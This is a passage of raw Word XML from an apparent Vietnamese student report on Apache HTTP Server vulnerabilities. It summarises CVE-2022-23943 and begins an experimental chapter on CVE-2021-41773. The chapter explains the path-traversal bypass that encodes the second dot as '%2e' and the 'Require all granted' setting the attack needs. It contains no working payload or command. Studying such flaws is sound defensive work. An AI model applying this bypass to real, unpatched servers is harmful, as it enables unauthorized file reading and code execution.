        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0068512A">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="0068512A" w:rsidRPr="0068512A">
        <w:t xml:space="preserve">ấn đề này xuất hiện </w:t>
      </w:r>
      <w:r w:rsidR="00916DA6">
        <w:t>trên</w:t>
      </w:r>
      <w:r w:rsidR="0068512A" w:rsidRPr="0068512A">
        <w:t xml:space="preserve"> Apache HTTP Server 2.4.53</w:t>
      </w:r>
      <w:r w:rsidR="00452C8E" w:rsidRPr="00452C8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB0756">
        <w:t xml:space="preserve">và các phiên bản trước đó </w:t>
      </w:r>
      <w:r w:rsidR="00452C8E" w:rsidRPr="00452C8E">
        <w:t>trên Windows</w:t>
      </w:r>
      <w:r w:rsidR="0068512A" w:rsidRPr="0068512A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C82DDF" w:rsidRPr="00C82DDF">
        <w:t>có thể đọc vượt quá giới hạn</w:t>
      </w:r>
      <w:r w:rsidR="00795695">
        <w:t xml:space="preserve"> bộ nhớ</w:t>
      </w:r>
      <w:r w:rsidR="00C82DDF" w:rsidRPr="00C82DDF">
        <w:t xml:space="preserve"> khi được định cấu hình để xử lý các yêu cầu bằng mô-đun mod_isap</w:t>
      </w:r>
      <w:r w:rsidR="00C82DDF">
        <w:t>i.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D514D50" w14:textId="6EA9FBD6" w:rsidR="00307547" w:rsidRDefault="00FF44DB" w:rsidP="00F43699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00665E5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2022-23943:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E10A7">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="006E10A7" w:rsidRPr="006E10A7">
        <w:t>à một lỗ hổng bảo mật nghiêm trọng ảnh hưởng đến Apache HTTP Server, cụ thể là mô-đun mod_sed. Vấn đề viết ngoài phạm vi (out-of-bounds write) này cho phép kẻ tấn công ghi đè bộ nhớ heap</w:t>
      </w:r>
      <w:r w:rsidR="006E10A7">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="0081714E">
        <w:t>một khu vực trong bộ nhớ của máy tính được sử dụng để cấp phát và quản lý bộ nhớ động trong quá trình chạy của các chương trình</w:t>
      </w:r>
      <w:r w:rsidR="006E10A7">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006E10A7" w:rsidRPr="006E10A7">
        <w:t xml:space="preserve"> bằng dữ liệu có thể độc hại, ảnh hưởng đến các hệ thống chạy Apache HTTP Server phiên bản 2.4.52 và các phiên bản trước đó</w:t>
      </w:r>
      <w:r w:rsidR="000438CD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00307547">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B3FCF3" w14:textId="3B19D5A0" w:rsidR="00307547" w:rsidRDefault="00307547" w:rsidP="00307547">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc171085518"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 4: THỰC NGHIỆM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="044B7036" w14:textId="77777777" w:rsidR="00032B9E" w:rsidRPr="00032B9E" w:rsidRDefault="00032B9E" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc171085519"/>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="550BA6C7" w14:textId="02187837" w:rsidR="00307547" w:rsidRDefault="00032B9E" w:rsidP="00524DD9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="65" w:name="_Toc171085520"/>
      <w:r>
        <w:t>Đối tượng thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="13BCEB35" w14:textId="25AB30E9" w:rsidR="00ED2F1D" w:rsidRDefault="00ED2F1D" w:rsidP="00524DD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED2F1D">
        <w:t>CVE-2021-41773 trong Apache HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F8B878" w14:textId="5B6FB4BC" w:rsidR="00F02512" w:rsidRDefault="00F02512" w:rsidP="004743A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="66" w:name="_Toc171085521"/>
      <w:r>
        <w:t>CVE-2021-41773</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="219D4E0C" w14:textId="5773B635" w:rsidR="00F02512" w:rsidRDefault="009B083B" w:rsidP="004743A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc171085522"/>
      <w:r>
        <w:t>Thông tin cơ bản</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="3608B39D" w14:textId="19C4D2C5" w:rsidR="00F54F4F" w:rsidRDefault="00C04D3A" w:rsidP="004743A8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Điểm số theo hệ thống đánh giá lỗ hổng chung (CVS) </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">cho </w:t>
      </w:r>
      <w:r w:rsidRPr="00D106C4">
        <w:t>CVE-2021-41773</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="141414"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>là 7.5, theo Cơ sở dữ liệu lỗ hổng quốc gia (NVD). Điểm số 7.5 cho thấy mức độ nghiêm trọng cao.</w:t>
      </w:r>
      <w:r w:rsidR="00A544B9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Điều này cho thấy lỗ hổng này có nguy cơ cao và có thể bị khai thác để gây ra thiệt hại hoặc gián đoạn lớn.</w:t>
      </w:r>
      <w:r w:rsidR="00A544B9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Nền tảng bị ảnh hưởng bởi lỗ hổng này là Apache HTTP Server, một phần mềm máy chủ web được sử dụng rộng rãi để lưu trữ các trang web và ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2E720" w14:textId="7CE6BB33" w:rsidR="00C04D3A" w:rsidRDefault="00D106C4" w:rsidP="004743A8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Có hai loại lỗ hổng được đề cập</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong </w:t>
      </w:r>
      <w:r w:rsidR="00C52D04">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> này</w:t>
      </w:r>
      <w:r w:rsidR="00E227E4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A579C3" w14:textId="056029FF" w:rsidR="00E227E4" w:rsidRPr="00E867AF" w:rsidRDefault="00E867AF" w:rsidP="004743A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Path Traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Loại lỗ hổng này cho phép kẻ tấn công truy cập vào các thư mục và tập tin nằm ngoài thư mục gốc của web. Điều này có thể dẫn đến việc truy cập trái phép vào các tập tin nhạy cảm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8CCC22" w14:textId="23E11499" w:rsidR="00E867AF" w:rsidRPr="00B65BE9" w:rsidRDefault="00B46D49" w:rsidP="004743A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Lỗ hổng này cho phép kẻ tấn công thực thi mã tùy ý trên máy chủ. Điều này có thể dẫn đến việc kiểm soát hoàn toàn máy chủ bị ảnh hưởng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D4AB0" w14:textId="40E024BA" w:rsidR="00B65BE9" w:rsidRDefault="00B65BE9" w:rsidP="004743A8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B2015C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Các phiên bản cụ thể của Apache HTTP Server bị ảnh hưởng là 2.4.49 và 2.4.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE43C14" w14:textId="77777777" w:rsidR="00032DC1" w:rsidRPr="00032DC1" w:rsidRDefault="00032DC1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc171085523"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="008C3239" w14:textId="77777777" w:rsidR="00032DC1" w:rsidRPr="00032DC1" w:rsidRDefault="00032DC1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc171085524"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="52F487AA" w14:textId="77777777" w:rsidR="00032DC1" w:rsidRPr="00032DC1" w:rsidRDefault="00032DC1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc171085525"/>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="0CB8A1F6" w14:textId="77777777" w:rsidR="00032DC1" w:rsidRPr="00032DC1" w:rsidRDefault="00032DC1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc171085526"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="427EA7D9" w14:textId="77777777" w:rsidR="00032DC1" w:rsidRPr="00032DC1" w:rsidRDefault="00032DC1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc171085527"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="05D362DA" w14:textId="77777777" w:rsidR="00032DC1" w:rsidRPr="00032DC1" w:rsidRDefault="00032DC1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc171085528"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="75440309" w14:textId="77777777" w:rsidR="00032DC1" w:rsidRPr="00032DC1" w:rsidRDefault="00032DC1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc171085529"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="13C8ACFC" w14:textId="7F926A89" w:rsidR="00715896" w:rsidRDefault="00702851" w:rsidP="004743A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc171085530"/>
      <w:r>
        <w:t>Thông tin ch</w:t>
      </w:r>
      <w:r w:rsidR="004B4704">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="6D07762B" w14:textId="1A44C6D8" w:rsidR="00A41733" w:rsidRDefault="00A41733" w:rsidP="004743A8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Nguyên nhâ</w:t>
      </w:r>
      <w:r w:rsidR="00481588">
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088291A9" w14:textId="00051015" w:rsidR="00A41733" w:rsidRDefault="0024173D" w:rsidP="004743A8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Từ code </w:t>
      </w:r>
      <w:r w:rsidR="00593A0A" w:rsidRPr="00593A0A">
        <w:t>của các phiên bản thì ta thấy đoạn code chuẩn hóa url như sau</w:t>
      </w:r>
      <w:r w:rsidR="00593A0A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873BDC4" w14:textId="3A575D2A" w:rsidR="00593A0A" w:rsidRDefault="00A96791" w:rsidP="00A12239">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc171085234"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77B3647A" wp14:editId="0915E7BE">
            <wp:extent cx="5972175" cy="953135"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="20333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953135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A12239">
        <w:t xml:space="preserve">Hình 4. </w:t>
      </w:r>
      <w:r w:rsidR="00A12239">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A12239">
        <w:instrText xml:space="preserve"> SEQ Hình_4. \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00A12239">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A10E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A12239">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A12239">
        <w:t>: Code chuẩn hóa của Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="3A3553E0" w14:textId="51767BB4" w:rsidR="00A96791" w:rsidRDefault="00820408" w:rsidP="00A12239">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00820408">
        <w:lastRenderedPageBreak/>
        <w:t>Nguyên nhân dẫn đến lỗ hổng là nhà phát triển đã thêm một số thay đổi trong mã nguồn chuẩn hóa đường dẫn (loại bỏ các phần không mong muốn hoặc nguy hiểm trong URL)</w:t>
      </w:r>
      <w:r w:rsidR="00A327D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A327D4" w:rsidRPr="00A327D4">
        <w:t xml:space="preserve">nhưng web server không thể phát hiện ra các ký tự được truyền qua URL dưới dạng </w:t>
      </w:r>
      <w:r w:rsidR="00A327D4" w:rsidRPr="00A327D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"dot-dot-slash" (../)</w:t>
      </w:r>
      <w:r w:rsidR="00A327D4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B820C4" w:rsidRPr="00B820C4">
        <w:t>Chức năng chuẩn hóa đường dẫn trong ứng dụng chịu trách nhiệm giải mã các giá trị được mã hóa ở URL từ URI để ngăn chặn việc lợi dụng lỗ hỗng Path traversal.</w:t>
      </w:r>
      <w:r w:rsidR="004B2300">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B2300" w:rsidRPr="004B2300">
        <w:t xml:space="preserve">Chức năng này đã dễ dàng bị vượt qua khi kẻ tấn công mã hóa thành </w:t>
      </w:r>
      <w:r w:rsidR="004B2300" w:rsidRPr="00665C40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"%2e"</w:t>
      </w:r>
      <w:r w:rsidR="004B2300" w:rsidRPr="004B2300">
        <w:t xml:space="preserve"> ở dấu chấm thứ 2, từ đó kẻ tấn công có thể chuyển </w:t>
      </w:r>
      <w:r w:rsidR="004B2300" w:rsidRPr="00665C40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r w:rsidR="004B2300" w:rsidRPr="004B2300">
        <w:t xml:space="preserve"> thành </w:t>
      </w:r>
      <w:r w:rsidR="004B2300" w:rsidRPr="00665C40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.%2e/</w:t>
      </w:r>
      <w:r w:rsidR="004B2300" w:rsidRPr="004B2300">
        <w:t xml:space="preserve"> để thực hiện việc tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00665C40">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AACFBBB" w14:textId="1936CC62" w:rsidR="009B083B" w:rsidRDefault="00B143E1" w:rsidP="00A12239">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00B143E1">
        <w:t xml:space="preserve">Ngoài ra, thì </w:t>
      </w:r>
      <w:r w:rsidR="00957C99">
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00B143E1">
        <w:t>ể khai thác thành công lỗ hổng này thì Apache Http Server cần phải được cấu hình directory directive cho toàn bộ hệ thống là Require all trong file cấu hình</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AC79B0">
        <w:t xml:space="preserve"> Trong đó </w:t>
      </w:r>
      <w:r w:rsidR="00EB0ABD" w:rsidRPr="00B143E1">
        <w:t>directory directive</w:t>
      </w:r>
      <w:r w:rsidR="00413E3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00611D8B">
        <w:t>cho phép quản trị viên kiểm soát quyền truy cập và các thiết lập khác cho các thư mục cụ thể trên máy chủ.</w:t>
      </w:r>
      <w:r w:rsidR="007A7653">
        <w:t xml:space="preserve"> Nếu được thiết lập </w:t>
      </w:r>
      <w:r w:rsidR="007A7653" w:rsidRPr="00B143E1">
        <w:t>Require all grandted</w:t>
      </w:r>
      <w:r w:rsidR="00866D86">
        <w:t xml:space="preserve"> bất kì người dùng nào</w:t>
      </w:r>
      <w:r w:rsidR="00A6006A">
        <w:t xml:space="preserve"> gửi yêu cầu HTTP tới máy chủ đều có thể truy cập vào các tài nguyên trong thư mục đó mà không cần xác thực hoặc kiểm tra quyền truy cập.</w:t>
      </w:r>
      <w:r w:rsidR="00E9471E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C0D25" w14:textId="18012EF4" w:rsidR="0011485A" w:rsidRDefault="0011485A" w:rsidP="00A12239">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình tồn tại lỗ hổng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D0491" w14:textId="40E89C17" w:rsidR="0011485A" w:rsidRDefault="0011485A" w:rsidP="009B083B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D294B1F" wp14:editId="29138386">
            <wp:extent cx="5972175" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="172262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809625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
